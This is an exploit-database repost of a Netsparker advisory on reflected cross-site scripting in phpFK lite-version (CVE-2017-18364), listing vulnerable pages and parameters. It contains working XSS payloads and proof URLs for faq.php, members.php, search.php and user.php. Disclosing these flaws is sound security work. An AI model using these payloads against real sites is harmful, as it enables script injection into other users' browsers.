Advertisement






phpFK lite-version Cross Site Scripting

CVE Category Price Severity
CVE-2017-18364 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2019-07-11
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019070053

Below is a copy:

phpFK lite-version Cross Site Scripting
*Information:*

Advisory by Netsparker
Name: Multiple Cross-site Scripting Vulnerabilities in phpFK
Affected Software: phpFK
Affected Versions: lite-version
Homepage: https://www.frank-karau.de/
Vulnerability: Reflected Cross-site Scripting
Severity: 7.4 High
Status: Not Fixed
CVSS Score (3.0): CVE-2017-18364
CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
Netsparker Advisory Reference: NS-19-006

*Technical Details:*

/faq.php (Query Based (Query String))

Parameter Name : Query Based
Parameter Type : Query String
Attack Pattern :
'"--></style></scRipt><scRipt>netsparker(0x00164F)</scRipt>
Proof URL : http://
{domain}/faq.php?'"--></style></scRipt><scRipt>alert(0x00164F)</scRipt>

/members.php (Query Based (Query String))

Parameter Name : Query Based
Parameter Type : Query String
Attack Pattern :
'"--></style></scRipt><scRipt>netsparker(0x00158E)</scRipt>
Proof URL : http://
{domain}/members.php?'"--></style></scRipt><scRipt>alert(0x00158E)</scRipt>

/members.php (search (GET))

Parameter Name : search
Parameter Type : GET
Attack Pattern : x%22+onmouseover%3dnetsparker(0x0069A0)+x%3d%22
Proof URL : http://
{domain}/members.php?search=x"%20onmouseover=netsparker(0x0069A0)%20x="&sort=username

/members.php (search (POST))

Parameter Name : search
Parameter Type : POST
Attack Pattern : x%22+onmouseover%3dnetsparker(0x006EBA)+x%3d%22

/search.php (Query Based (Query String))

Parameter Name : Query Based
Parameter Type : Query String
Attack Pattern : '"--></style></scRipt><scRipt>netsparker(0x00171D)</scRipt>
Proof URL : http://
{domain}/search.php?'"--></style></scRipt><scRipt>alert(0x00171D)</scRipt>

/user.php (user (GET))

Parameter Name : user
Parameter Type : GET
Attack Pattern :
%3c%2ftitle%3e%3cscRipt%3enetsparker(0x001122)%3c%2fscRipt%3e
Proof URL : http://
{domain}/user.php?user=</title><scRipt>netsparker(0x001122)</scRipt>

For more information:
https://www.netsparker.com/web-applications-advisories/ns-19-006-reflected-cross-site-scripting-in-phpfk/

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum